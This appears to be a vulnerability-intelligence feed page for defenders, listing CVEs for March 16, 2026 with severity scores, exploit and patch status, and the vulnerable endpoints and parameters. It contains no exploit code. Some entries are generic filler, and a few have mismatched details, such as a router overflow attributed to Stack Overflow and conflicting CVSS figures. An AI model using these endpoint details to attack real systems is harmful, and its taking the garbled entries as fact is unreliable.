THREAT ALERT

ACT NOW CVE-2026-3910 8.8 Chrome's V8 JavaScript engine contains an inappropriate implementation (CVE-2026-3910, CVSS 8.8) that allows remote attackers to execute arbitrary code within the browser sandbox via crafted HTML pages. KEV-listed with public PoC, this V8 vulnerability affects all Chromium-based browsers and enables drive-by exploitation through any web page containing malicious JavaScript. | ACT NOW CVE-2026-3909 8.8 Google Chrome's Skia graphics library contains an out-of-bounds write (CVE-2026-3909, CVSS 8.8) enabling remote attackers to perform memory corruption through crafted HTML pages. KEV-listed with public PoC and patches available, this vulnerability in the core graphics rendering engine affects all Chromium-based browsers. | ACT NOW CVE-2025-14558 7.2 The rtsol(8) and rtsold(8) programs do not validate the domain search list options provided in router advertisement messages; the option body is passed to resolvconf(8) unmodified. resolvconf(8) is a shell script which does not validate its input. [CVSS 7.2 HIGH] | EMERGENCY CVE-2026-20131 10.0 Cisco Secure Firewall Management Center (FMC) contains a critical unauthenticated Java deserialization vulnerability (CVE-2026-20131, CVSS 10.0) in its web interface that enables remote code execution as root. KEV-listed with public PoC, this vulnerability allows complete compromise of the central management platform that controls all Cisco firewalls in the organization, enabling attackers to modify security policies, disable protections, and access all network traffic. | EMERGENCY CVE-2026-27971 9.8 RCE in Qwik JavaScript framework <= 1.19.0 via unsafe deserialization in server$ Runtime. EPSS 13.4% with PoC available. | ACT NOW CVE-2026-21385 7.8 A Qualcomm chipset vulnerability (CVE-2026-21385) causes memory corruption through improper integer handling during memory allocation, enabling local privilege escalation to kernel level. KEV-listed and patched, this vulnerability affects Qualcomm-based mobile devices and embedded systems, potentially impacting billions of Android devices globally. | ACT NOW CVE-2026-22719 8.1 VMware Aria Operations contains a command injection vulnerability (CVE-2026-22719, CVSS 8.1) that allows unauthenticated remote attackers to execute arbitrary commands during support-assisted product migration. KEV-listed with patches available, this vulnerability targets the infrastructure monitoring platform that has visibility into the entire virtualized environment. | EMERGENCY CVE-2026-20127 10.0 Cisco Catalyst SD-WAN Controller and Manager contain a critical authentication bypass (CVE-2026-20127, CVSS 10.0) in the peering authentication mechanism that allows unauthenticated remote attackers to obtain full administrative privileges. The vulnerability exists because peering authentication does not properly validate credentials, enabling any attacker with network access to take over the SD-WAN management plane and control the entire WAN fabric. | EMERGENCY CVE-2026-27180 9.8 MajorDoMo home automation platform is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method without authentication due to improper use of gr() (which reads from $_REQUEST), allowing attackers to redirect update URLs and push malicious code packages. | EMERGENCY CVE-2026-27175 9.8 Unauthenticated OS command injection in MajorDoMo via rc/index.php. EPSS 41.7% — the $param variable is passed unsanitized to shell commands. PoC available. | EMERGENCY CVE-2026-27174 9.8 MajorDoMo home automation platform allows unauthenticated remote code execution through the admin panel's PHP console. An include order bug in panel.class.php causes execution to continue past a redirect() call that lacks an exit statement, allowing unauthenticated requests to reach the PHP code execution functionality in inc_panel_ajax.php. | ACT NOW CVE-2026-22769 10.0 Dell RecoverPoint for Virtual Machines prior to 6.0.3.1 HF1 contains hardcoded credentials (CVE-2026-22769, CVSS 10.0) that allow unauthenticated remote attackers with knowledge of the credentials to gain root-level access to the underlying operating system. KEV-listed, this vulnerability exposes disaster recovery infrastructure to complete compromise, potentially affecting the integrity of backup and replication data. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Track vulnerabilities that matter to your stack

Personalized alerts, dashboards, and weekly digests – free.

Trending Now

Critical Watch

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — March 16, 2026

238 CVEs tracked today. 18 Critical, 78 High, 112 Medium, 26 Low.

CVE-2026-32767 CRITICAL CVSS 9.8
An authorization bypass vulnerability in SiYuan Note v3.6.0 and earlier allows any authenticated user, including those with read-only 'Reader' role privileges, to execute arbitrary SQL commands through the /api/search/fullTextSearchBlock endpoint when the method parameter is set to 2. This enables attackers to read, modify, or delete all data in the application's SQLite database, completely bypassing the application's role-based access controls. A detailed proof-of-concept demonstrates how Reader-role users can execute destructive SQL operations including dropping tables.

SQLi Docker
CVE-2026-32760 CRITICAL CVSS 9.8
Unauthenticated attackers can register administrator accounts in Docker when self-registration is enabled and default user permissions include admin privileges, as the signup handler fails to strip admin permissions from self-registered accounts. Public exploit code exists for this vulnerability. No patch is currently available.

Privilege Escalation Docker
CVE-2026-32751 CRITICAL CVSS 9.0
SiYuan's mobile file tree fails to sanitize notebook names in WebSocket rename events, allowing authenticated users to inject arbitrary HTML and JavaScript that executes in other clients' browsers. When combined with Electron's insecure configuration (nodeIntegration enabled, contextIsolation disabled), this stored XSS escalates to remote code execution with full Node.js privileges on affected desktop and mobile clients. The vulnerability affects users with notebook rename permissions across Docker, Node.js, Python, and Apple platforms.

Docker RCE XSS Node.js Command Injection
CVE-2026-32737 CRITICAL CVSS 10.0
CVE-2026-32737 is a security vulnerability (CVSS 10.0). Critical severity with potential for significant impact on affected systems. Vendor patch is available.

Authentication Bypass
CVE-2026-32633 CRITICAL CVSS 9.1
The Glances system monitoring tool exposes reusable authentication credentials for downstream servers through an unauthenticated API endpoint when running in Central Browser mode without password protection. This vulnerability allows any network attacker to retrieve pbkdf2-hashed passwords that can be replayed to access protected Glances servers across an entire monitored fleet. A proof-of-concept is included in the advisory demonstrating credential extraction from the /api/4/serverslist endpoint.

Python Information Disclosure
CVE-2026-32267 CRITICAL CVSS 9.8
A security vulnerability in Craft CMS (CVSS 9.8). Critical severity with potential for significant impact on affected systems.

Authentication Bypass Cms
CVE-2026-28430 CRITICAL CVSS 9.8
Unauthenticated SQL injection in Chamilo LMS versions prior to 1.11.34 enables remote attackers to execute arbitrary database queries through the custom_dates parameter and escalate to full administrative account takeover by exploiting a predictable password reset mechanism. This critical vulnerability exposes the entire database including personally identifiable information and system configurations without requiring any credentials or user interaction. No patch is currently available for affected installations.

SQLi Chamilo Lms
CVE-2026-27962 CRITICAL CVSS 9.1
A critical authentication bypass vulnerability in authlib's JWT signature verification allows attackers to forge arbitrary tokens by injecting their own cryptographic keys through the JWT header. The flaw affects all versions of authlib prior to 1.6.9 when applications use key resolution callbacks that can return None (common in JWKS-based authentication flows). A working proof-of-concept exists demonstrating complete authentication bypass, enabling attackers to impersonate any user or assume administrative privileges without valid credentials.

Docker Python Deserialization Jwt Attack Redhat
CVE-2026-25534 CRITICAL CVSS 9.1
Java URL parsing in Spinnaker's clouddriver and Orca components fails to properly validate URLs containing underscores, allowing authenticated attackers to bypass URL sanitation controls and potentially execute arbitrary code or access unauthorized resources. This vulnerability affects both the clouddriver artifact handling and Orca fromUrl expression evaluation in versions prior to 2025.2.4, 2025.3.1, 2025.4.1, and 2026.0.0. Patched versions are available, and affected deployments can temporarily disable the vulnerable components as a workaround.

SSRF Java
CVE-2026-23489 CRITICAL CVSS 9.1
A critical remote code execution vulnerability exists in the Fields plugin for GLPI that allows authenticated users with dropdown creation privileges to execute arbitrary PHP code on the server. The vulnerability affects Fields plugin versions prior to 1.23.3 and has a CVSS score of 9.1, indicating severe impact with the ability to compromise the entire system. While no active exploitation has been reported in KEV and no public proof-of-concept is mentioned, the straightforward attack vector and high privileges requirement suggest targeted insider threat or compromised account scenarios.

PHP RCE Fields
CVE-2026-4254 CRITICAL CVSS 9.8
Remote code execution in Tenda AC8 firmware versions up to 16.03.50.11 results from a stack-based buffer overflow in the HTTP endpoint handling password change requests. An unauthenticated attacker can exploit this vulnerability over the network to execute arbitrary commands with full system privileges. Public exploit code exists for this vulnerability and no patch is currently available.

Buffer Overflow Tenda
CVE-2026-4177 CRITICAL CVSS 9.1
A critical heap buffer overflow vulnerability exists in YAML::Syck through version 1.36 for Perl, allowing remote attackers to potentially execute arbitrary code or cause denial of service without authentication. The vulnerability stems from multiple memory corruption issues including heap overflow when processing YAML class names exceeding 512 bytes, buffer overread in base64 decoding, and memory leaks. With a CVSS score of 9.1 and network-based attack vector requiring no user interaction, this presents a severe risk to applications parsing untrusted YAML input.

Heap Overflow Buffer Overflow
CVE-2025-69902 CRITICAL CVSS 9.8
A command injection vulnerability in the minimal_wrapper.py component of kubectl-mcp-server v1.2.0 allows attackers to execute arbitrary commands via injecting arbitrary shell metacharacters.

Command Injection RCE Code Injection
CVE-2025-69809 CRITICAL CVSS 9.8
A critical write-what-where memory corruption vulnerability exists in p2r3 Bareiron (commit 8e4d40) that allows unauthenticated remote attackers to write arbitrary values to memory locations, enabling arbitrary code execution through specially crafted network packets. The vulnerability carries a CVSS score of 9.8 and is remotely exploitable without authentication, though it is not currently listed in CISA KEV and has no EPSS score data available. A proof-of-concept appears to exist based on the GitHub reference to a dedicated CVE repository.

RCE
CVE-2025-69808 CRITICAL CVSS 9.1
An out-of-bounds memory access (OOB) in p2r3 Bareiron commit 8e4d40 allows unauthenticated attackers to access sensitive information and cause a Denial of Service (DoS) via supplying a crafted packet.

Denial Of Service Information Disclosure Buffer Overflow
CVE-2025-62319 CRITICAL CVSS 9.8
A Boolean-based SQL injection vulnerability exists in HCL Unica that allows remote attackers to manipulate backend database queries through specially crafted input fields. The vulnerability affects HCL Unica version 25.1.1 and below, enabling unauthenticated attackers to extract sensitive data, modify database contents, or potentially compromise the entire system. With a critical CVSS score of 9.8 and network-based attack vector requiring no authentication, this represents a severe risk to organizations using affected Unica installations.

SQLi Unica
CVE-2017-20224 CRITICAL CVSS 9.8
An unauthenticated arbitrary file upload vulnerability in Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 allows remote attackers to upload malicious files and execute code through improperly enabled WebDAV HTTP methods. Attackers can achieve remote code execution or denial of service without any authentication, making this a critical risk for exposed devices. Multiple proof-of-concept exploits are publicly available through security research publications.

RCE Denial Of Service File Upload Sdt Cs3b1
CVE-2017-20223 CRITICAL CVSS 9.8
An insecure direct object reference vulnerability in Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 allows remote attackers to bypass authentication and directly access sensitive resources by manipulating input parameters. With a publicly available proof-of-concept exploit and a critical CVSS score of 9.8, attackers can gain unauthorized access to sensitive information and system functionalities without any authentication or user interaction required.

Authentication Bypass Sdt Cs3b1
CVE-2026-32813 HIGH CVSS 8.0
A second-order SQL injection vulnerability exists in Admidio's MyList configuration feature, allowing authenticated users to inject arbitrary SQL commands through list column configurations that are safely stored but unsafely read back. The vulnerability enables attackers to read sensitive data including password hashes, modify database contents, or achieve full database compromise. A detailed proof-of-concept is available demonstrating exploitation requiring only standard user privileges.

CSRF SQLi PHP Privilege Escalation
CVE-2026-32805 HIGH CVSS 7.5
Path traversal in the webserver's archive extraction function allows unauthenticated remote attackers to write files outside the intended directory by crafting malicious tar archives, due to incomplete path validation in the sanitizeArchivePath function. The vulnerability affects the download command's decompression functionality and could enable arbitrary file placement on the system. A patch is available.

Path Traversal
CVE-2026-32775 HIGH CVSS 7.4
A critical integer underflow vulnerability in libexif library versions up to 0.6.25 allows attackers to cause buffer overflows when processing malformed EXIF MakerNotes data in image files. This vulnerability can lead to arbitrary code execution or information disclosure when a victim opens a maliciously crafted image file containing specially crafted EXIF metadata. While not currently listed in CISA KEV or showing high EPSS scores, the vulnerability has a published fix and affects a widely-used image metadata processing library.

Information Disclosure Integer Overflow Libexif
CVE-2026-32771 HIGH
Path traversal in the `extractor` CLI tool and `extract.DumpOTelCollector` library function allows attackers to write files outside the intended extraction directory by exploiting an incomplete path validation check in the `sanitizeArchivePath` function. A maliciously crafted tar archive can bypass the prefix check and place arbitrary files on the system when processed. A patch is available to address the missing trailing path separator validation.

Path Traversal
CVE-2026-32769 HIGH
CVE-2026-32769 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass
CVE-2026-32768 HIGH CVSS 7.9
CVE-2026-32768 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass
CVE-2026-32759 HIGH CVSS 8.1
Docker TUS resumable upload handler allows authenticated users to trigger arbitrary `after_upload` hooks unlimited times by supplying a negative value in the Upload-Length header, causing command execution with zero bytes actually uploaded. The integer overflow flaw in the completion logic (CWE-190) bypasses file upload requirements and enables privilege escalation through hook execution. No patch is currently available.

Integer Overflow Command Injection Denial Of Service Docker
CVE-2026-32756 HIGH CVSS 8.8
A critical unrestricted file upload vulnerability in Admidio's Documents & Files module allows authenticated users with upload permissions to bypass file extension restrictions by submitting an invalid CSRF token, enabling upload of PHP scripts that lead to Remote Code Execution. The vulnerability affects Admidio versions prior to the patch and has a published proof-of-concept demonstrating webshell upload and command execution. With a CVSS score of 8.8 and detailed exploitation steps available, this represents a high-priority risk for organizations using Admidio for document management.

CSRF PHP RCE Information Disclosure File Upload
CVE-2026-32749 HIGH CVSS 7.6
Path traversal in Python and Docker import endpoints allows authenticated administrators to write files to arbitrary filesystem locations by injecting directory traversal sequences in multipart upload filenames, potentially enabling remote code execution through placement of malicious files in executable paths. The vulnerability affects the POST /api/import/importSY and POST /api/import/importZipMd endpoints which fail to sanitize user-supplied filenames before constructing file write paths. No patch is currently available.

Python Docker Path Traversal
CVE-2026-32728 HIGH
File upload validation bypass in applications using MIME parameter injection allows authenticated attackers to upload malicious files by appending parameters like `;charset=utf-8` to the Content-Type header, bypassing extension filters and default blocklists. This enables stored XSS attacks that can compromise session tokens, credentials, and sensitive browser data accessible to the application's domain. A patch is available that strips MIME parameters during validation and expands the default blocklist.

Information Disclosure XSS
CVE-2026-32634 HIGH CVSS 8.1
A credential disclosure vulnerability exists in Glances monitoring tool when running in Central Browser mode with autodiscovery enabled. The vulnerability allows attackers on the same local network to steal reusable authentication credentials by advertising fake Glances services via Zeroconf, as the application trusts untrusted service names for password lookups instead of using verified IP addresses. A working proof-of-concept is included in the advisory, and the issue has a CVSS score of 8.1 indicating high severity.

Python Information Disclosure
CVE-2026-32611 HIGH CVSS 7.0
SQL injection in Python's Glances DuckDB export module allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting malicious data through unparameterized table and column name interpolation in DDL statements. While INSERT values use parameterized queries, identifier names are directly embedded via f-strings, enabling attackers over the network to manipulate database structure and access sensitive monitoring data. A patch is available.

Python SQLi
CVE-2026-32610 HIGH CVSS 8.1
A critical CORS misconfiguration in the Glances system monitoring tool's REST API allows any website to steal sensitive system information from users who visit a malicious page while having access to a Glances instance. The vulnerability affects all versions prior to 4.5.2 and enables cross-origin theft of system stats, configuration secrets, database passwords, API keys, and command-line arguments. A proof-of-concept is publicly available, though no active exploitation has been reported yet.

Python Information Disclosure Docker Cors Misconfiguration
CVE-2026-32609 HIGH CVSS 7.5
A critical information disclosure vulnerability in Glances system monitoring tool allows unauthenticated remote attackers to access sensitive configuration data including password hashes, SNMP community strings, and authentication keys through unprotected API endpoints. The vulnerability affects Glances versions prior to 4.5.2 when running in web server mode without password protection (the default configuration), and a proof-of-concept demonstrating the attack is publicly available. While not currently in CISA's Known Exploited Vulnerabilities catalog, the issue has a high CVSS score of 7.5 due to the ease of exploitation and severity of exposed secrets.

Python Information Disclosure
CVE-2026-32608 HIGH CVSS 7.0
Glances monitoring system allows local attackers with limited privileges to execute arbitrary commands by injecting shell metacharacters into process or container names, which bypass command sanitization in the action execution handler. The vulnerability affects the threshold alert system that dynamically executes administrator-configured shell commands populated with runtime monitoring data. An attacker controlling a process name or container name can manipulate command parsing to break out of intended command boundaries and inject malicious commands.

Privilege Escalation Nginx Python Command Injection Docker
CVE-2026-32606 HIGH CVSS 7.6
A critical physical access vulnerability in IncusOS allows attackers to bypass LUKS disk encryption without breaking Secure Boot or modifying the kernel. The vulnerability affects all IncusOS versions through mkosi prior to version 202603142010 and enables attackers with physical access to extract encryption keys by substituting the encrypted root partition with their own malicious partition. This vulnerability has been patched and a proof-of-concept attack methodology has been publicly documented.

Information Disclosure
CVE-2026-32596 HIGH CVSS 7.5
Glances web server exposes its REST API without authentication by default when started with the -w flag, allowing unauthenticated remote attackers to access sensitive system information including process details that may contain credentials such as passwords and API keys. The vulnerability affects Python and Docker deployments where Glances is exposed to untrusted networks due to the server binding to 0.0.0.0 with authentication disabled by default. A patch is available to address this configuration vulnerability.

Python Docker Information Disclosure
CVE-2026-32268 HIGH
The DefaultController->actionLoadContainerData() endpoint in the Microsoft plugin permits unauthenticated attackers possessing a valid CSRF token to enumerate accessible storage buckets and extract sensitive data from Azure error messages. This authorization bypass affects users running unpatched versions prior to 2.1.1, exposing cloud storage infrastructure details and potentially sensitive system information through verbose error responses.

Information Disclosure Authentication Bypass Microsoft CSRF
CVE-2026-32264 HIGH CVSS 7.2
Remote code execution in Craft CMS allows authenticated administrators with control panel access to execute arbitrary code by exploiting an incomplete patch that left the same vulnerable gadget chain pattern in multiple controllers. The vulnerability requires administrative privileges and the allowAdminChanges setting to be enabled, limiting exposure to trusted users with elevated access. Craft CMS versions before 4.17.5 and 5.9.11 are affected and should be patched immediately.

PHP Information Disclosure
CVE-2026-32263 HIGH CVSS 7.2
Unsafe deserialization of untrusted user input in PHP Craft CMS allows authenticated high-privilege users to inject arbitrary Yii2 behaviors and event handlers, enabling remote code execution through the EntryTypesController. An incomplete prior patch for a similar vulnerability left the same dangerous pattern in place, permitting attackers with administrative access to manipulate application configuration and achieve full system compromise. A patch is available to properly sanitize configuration inputs before processing.

Code Injection PHP
CVE-2026-32261 HIGH CVSS 8.5
A security vulnerability in renders user-supplied template content (CVSS 8.5) that allows an authenticated user with access. High severity vulnerability requiring prompt remediation. Vendor patch is available.

RCE PHP
CVE-2026-31386 HIGH CVSS 7.2
OpenLiteSpeed and LSWS Enterprise web servers contain an OS command injection vulnerability that allows attackers with administrative privileges to execute arbitrary system commands. All versions of both products are affected according to EUVD data. While requiring high privileges limits the attack surface, successful exploitation grants complete system control with high impact to confidentiality, integrity, and availability (CVSS 7.2).

Command Injection Lsws Enterprise Openlitespeed
CVE-2026-30881 HIGH CVSS 8.8
Authenticated attackers can exploit SQL injection in Chamilo LMS 1.11.34 and earlier through the statistics AJAX endpoint, where insufficient input sanitization allows bypassing of database escaping mechanisms via the date_start and date_end parameters. This vulnerability enables blind time-based SQL injection attacks to extract or manipulate sensitive data from the underlying database. Version 1.11.36 contains the patch; versions 1.11.35 and earlier remain vulnerable.

SQLi Chamilo Lms
CVE-2026-30875 HIGH CVSS 8.8
An arbitrary file upload vulnerability in Chamilo LMS allows authenticated users with Teacher role to achieve Remote Code Execution by uploading malicious H5P packages. The flaw affects versions prior to 1.11.36 and stems from inadequate validation of H5P package contents, which only checks for h5p.json existence but fails to block .htaccess or PHP files with alternative extensions. With a CVSS score of 8.8 and high exploitation potential, attackers can upload webshells disguised as text files along with .htaccess configurations to bypass security controls.

PHP RCE File Upload Code Injection Chamilo Lms
CVE-2026-30405 HIGH CVSS 7.5
GoBGP gobgpd version 4.2.0 is vulnerable to denial of service attacks when processing malformed NEXT_HOP path attributes, allowing unauthenticated remote attackers to crash the BGP daemon without authentication or user interaction. This vulnerability affects BGP infrastructure relying on the vulnerable version and has no available patch at this time. The attack requires only network access to the BGP service, making it easily exploitable in environments running affected versions.

Denial Of Service
CVE-2026-29112 HIGH CVSS 7.5
The @dicebear/converter library before version 9.4.0 fails to validate SVG dimension attributes, allowing attackers to trigger excessive memory allocation by providing crafted SVGs with extremely large width and height values. Server-side applications processing untrusted or user-supplied SVGs through the conversion functions (toPng, toJpeg, toWebp, toAvif) are vulnerable to denial of service attacks. A patch is available in version 9.4.0 and users should upgrade immediately if processing external SVG inputs.

Denial Of Service
CVE-2026-28500 HIGH CVSS 8.6
ONNX's hub.load() function can be bypassed to load untrusted models without user confirmation when the silent parameter is enabled, allowing attackers to potentially deliver malicious models to applications that suppress security warnings. The vulnerability stems from improper logic in the repository trust verification mechanism that prioritizes the silent flag over security checks. This affects Python-based systems using ONNX and could lead to unauthorized code execution through model loading.

Python Information Disclosure Redhat Suse
CVE-2026-28498 HIGH CVSS 7.5
Authlib's OpenID Connect ID Token validation silently passes verification when encountering unsupported cryptographic algorithms, allowing attackers to bypass hash integrity checks on forged tokens. This fail-open behavior in the `_verify_hash` function affects applications using Authlib for OIDC authentication and could enable token forgery attacks. A patch is available.

Python RCE Redhat Suse
CVE-2026-27459 HIGH CVSS 7.2
Buffer overflow in pyOpenSSL's cookie generation callback allows attackers to corrupt memory and potentially achieve remote code execution by supplying oversized cookie values exceeding 256 bytes. The vulnerability affects applications using custom cookie callbacks with OpenSSL integration, where insufficient length validation permits writing beyond allocated buffer boundaries. A patch is available that implements proper cookie size validation.

OpenSSL Buffer Overflow Redhat Suse
CVE-2026-25369 HIGH CVSS 7.1
A reflected Cross-Site Scripting (XSS) vulnerability exists in the Flexmls® IDX WordPress plugin through version 3.15.9, allowing attackers to inject malicious scripts into web pages that execute in victims' browsers when they click specially crafted links. The vulnerability has a CVSS score of 7.1 and requires user interaction but can impact confidentiality, integrity, and availability across different origins due to its scope change characteristic. While not currently listed in CISA KEV or showing high EPSS scores, the vulnerability represents a moderate risk for WordPress sites using this real estate listing plugin.

XSS
CVE-2026-25083 HIGH CVSS 8.3
A critical authentication bypass vulnerability exists in GROWI's OpenAI assistant API endpoints where authorization checks are missing, allowing any authenticated user to access and manipulate other users' AI assistant conversations. The vulnerability affects GROWI versions 7.4.5 and earlier, enabling attackers with low-level credentials to compromise confidentiality and integrity of AI assistant threads and messages by simply knowing the assistant identifier. While not currently listed in CISA KEV and with no public exploit code identified, the vulnerability carries a high CVSS score of 8.3 due to its low exploitation complexity and significant data exposure potential.

Authentication Bypass AI / ML Growi
CVE-2026-24458 HIGH CVSS 7.5
Mattermost 10.11.x through 11.3.x fails to validate password length, allowing unauthenticated attackers to trigger denial of service by submitting multi-megabyte passwords during login attempts that consume excessive CPU and memory resources. The vulnerability affects all versions up to 10.11.10, 11.2.2, and 11.3.0, with no patch currently available.

Denial Of Service Mattermost Suse
CVE-2026-23862 HIGH CVSS 7.8
Dell ThinOS 10 versions before 2602_10.0573 contain a command injection flaw that allows local attackers with low privileges to execute arbitrary commands and escalate their access rights. The vulnerability stems from improper sanitization of special elements in user-supplied input, requiring only local access and no user interaction to exploit. No patch is currently available.

Dell Command Injection
CVE-2026-21005 HIGH CVSS 7.1
A path traversal vulnerability in Smart Switch (CVSS 7.1) that allows adjacent attackers. High severity vulnerability requiring prompt remediation.

Path Traversal
CVE-2026-21000 HIGH CVSS 7.0
Galaxy Store versions prior to 4.6.03.8 contain an access control flaw that enables local attackers to create files with elevated Galaxy Store privileges. This vulnerability affects local users on affected devices and could allow privilege escalation or persistence mechanisms. No patch is currently available.

Path Traversal
CVE-2026-20999 HIGH CVSS 7.1
Smart Switch versions prior to 3.7.69.15 contain a replay attack vulnerability in the authentication mechanism that allows remote attackers to bypass security controls and execute privileged functions without valid credentials. The vulnerability requires user interaction to trigger but poses a significant risk as no patch is currently available. Organizations using affected Smart Switch deployments should implement network-level controls to restrict access until an update is released.

Authentication Bypass
CVE-2026-20998 HIGH CVSS 7.1
Samsung Smart Switch versions prior to 3.7.69.15 contain an authentication bypass vulnerability that allows unauthenticated remote attackers to circumvent security controls. This vulnerability could enable attackers to gain unauthorized access to the application without valid credentials. No patch is currently available for this high-severity issue.

Authentication Bypass
CVE-2026-20996 HIGH CVSS 7.1
A cryptographic downgrade vulnerability in Samsung Smart Switch allows remote attackers to force the application to use weak authentication schemes during device-to-device transfers. The vulnerability affects Smart Switch versions prior to 3.7.69.15 and requires user interaction to exploit, potentially exposing sensitive data during the transfer process between Samsung devices. With a CVSS 4.0 score of 7.1 and no current evidence of active exploitation or public proof-of-concept code, this represents a moderate risk primarily to Samsung device users performing data migrations.

Information Disclosure
CVE-2026-20994 HIGH CVSS 7.0
A URL redirection vulnerability in Samsung Account allows remote attackers to potentially steal user access tokens through malicious redirect chains. The vulnerability affects Samsung Account versions prior to 15.5.01.1 and requires user interaction to exploit. While not currently in CISA's Known Exploited Vulnerabilities catalog, the issue has a moderate CVSS score of 7.0 and could lead to account takeover if successfully exploited.

Information Disclosure Samsung Open Redirect Samsung Account
CVE-2026-20990 HIGH CVSS 8.1
Google's Secure Folder prior to the March 2026 SMR release improperly exports Android application components, enabling local attackers to execute arbitrary activities with Secure Folder privileges. This high-severity vulnerability affects users with local device access and could allow privilege escalation or unauthorized access to protected data. No patch is currently available.

Information Disclosure Google Android
CVE-2026-4276 HIGH CVSS 7.5
CVE-2026-4276 is a security vulnerability (CVSS 7.5) that allows attackers. High severity vulnerability requiring prompt remediation.

Code Injection Rag Api
CVE-2026-4269 HIGH CVSS 7.5
Remote code execution in Bedrock AgentCore Starter Toolkit versions before v0.1.13 allows unauthenticated attackers to inject malicious code during the build process by exploiting missing S3 ownership verification, affecting only users who built the toolkit after September 24, 2025. An attacker can achieve arbitrary code execution within the AgentCore Runtime environment. Users must upgrade to version v0.1.13 to remediate this vulnerability, as no patch is currently available for earlier versions.

RCE
CVE-2026-4255 HIGH CVSS 8.4
A DLL search order hijacking vulnerability in Thermalright TR-VISION HOME allows local attackers to execute arbitrary code with administrative privileges through DLL side-loading. The vulnerability affects versions up to 2.0.5 and occurs because the application loads DLLs using Windows' default search order without verifying integrity or signatures, allowing malicious DLLs placed in writable directories to be loaded when the application runs. No active exploitation has been reported (not in KEV), no public POC is available, and EPSS data is not yet available for this CVE.

RCE Microsoft Tr Vision Home Windows
CVE-2026-4252 HIGH CVSS 8.9
A critical authentication bypass vulnerability exists in Tenda AC8 router firmware version 16.03.50.11 where the IPv6 handler function check_is_ipv6 relies on IP address for authentication, allowing remote attackers to gain unauthorized access. The vulnerability has a publicly available proof-of-concept exploit on GitHub and scores 9.8 CVSS, enabling complete compromise of the affected device with no authentication required. While not currently listed in CISA KEV, the combination of public exploit availability and ease of exploitation makes this a high-priority vulnerability for organizations using affected Tenda routers.

Tenda Information Disclosure
CVE-2026-4237 HIGH CVSS 7.3
SQL injection in Free Hotel Reservation System 1.0 allows unauthenticated remote attackers to manipulate the Home parameter in /hotel/admin/mod_reports/index.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected systems running the vulnerable PHP application are at immediate risk of data theft and database compromise.

SQLi PHP Free Hotel Reservation System
CVE-2026-4236 HIGH CVSS 7.3
SQL injection in itsourcecode Online Enrollment System 1.0 allows unauthenticated remote attackers to manipulate parameters in the enrollment module via the txtsearch, deptname, or name arguments. Public exploit code exists for this vulnerability, which enables attackers to read, modify, or delete database contents. No patch is currently available.

SQLi PHP Online Enrollment System
CVE-2026-4235 HIGH CVSS 7.3
SQL injection in itsourcecode Online Enrollment System 1.0 allows unauthenticated remote attackers to manipulate the user_email parameter in /sms/login.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive enrollment data without authentication. No patch is currently available.

SQLi PHP Online Enrollment System
CVE-2026-4232 HIGH CVSS 7.3
SQL injection in Tiandy Integrated Management Platform 7.17.0 via the /rest/user/getAuthorityByUserId endpoint allows unauthenticated remote attackers to manipulate the userId parameter and execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. Successful exploitation could enable unauthorized data access, modification, or system disruption.

SQLi Integrated Management Platform
CVE-2026-4231 HIGH CVSS 7.3
Server-side request forgery in Vanna AI versions up to 2.0.2 allows unauthenticated remote attackers to manipulate the update_sql and run_sql endpoints in the Flask component. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.

Python SSRF AI / ML Vanna
CVE-2026-4229 HIGH CVSS 7.3
SQL injection in Vanna AI's BigQuery integration (versions up to 2.0.2) allows unauthenticated remote attackers to manipulate the remove_training_data function through unsanitized ID parameters. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. Successful exploitation enables attackers to read, modify, or delete database contents with limited impact on confidentiality, integrity, and availability.

Google SQLi AI / ML Vanna
CVE-2026-4227 HIGH CVSS 8.8
Remote code execution in LB-LINK BL-WR9000 2.4.9 via buffer overflow in the /goform/get_hidessid_cfg endpoint allows authenticated attackers to achieve complete system compromise over the network. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. An attacker with login credentials can trigger the overflow in the sub_44D844 function to execute arbitrary code with full system privileges.

Buffer Overflow
CVE-2026-4226 HIGH CVSS 8.8
Stack Overflow's infrastructure contains a stack-based buffer overflow in a virtual configuration function that can be exploited remotely by authenticated attackers to achieve complete system compromise. Public exploit code is available for this vulnerability, and no patch has been released despite vendor notification. An attacker with valid credentials can manipulate input to the vulnerable endpoint and execute arbitrary code with full system privileges.

Buffer Overflow Stack Overflow
CVE-2026-4223 HIGH CVSS 7.3
SQL injection in itsourcecode Payroll Management System 1.0 via the ID parameter in /manage_employee.php allows unauthenticated remote attackers to execute arbitrary SQL queries and access or modify sensitive data. Public exploit code exists for this vulnerability, and no patch is currently available. Organizations running this system should implement network-level protections and consider upgrading to a patched version once released.

PHP SQLi
CVE-2026-4221 HIGH CVSS 7.3
An unrestricted file upload vulnerability exists in the Tiandy Easy7 Integrated Management Platform version 7.17.0, specifically in the /rest/file/uploadLedImage endpoint. This vulnerability allows remote attackers without authentication to upload arbitrary files, potentially leading to remote code execution. A proof-of-concept exploit has been publicly released and the vendor has not responded to disclosure attempts, leaving this vulnerability unpatched and actively exploitable.

File Upload Easy7 Integrated Management Platform
CVE-2026-4220 HIGH CVSS 7.3
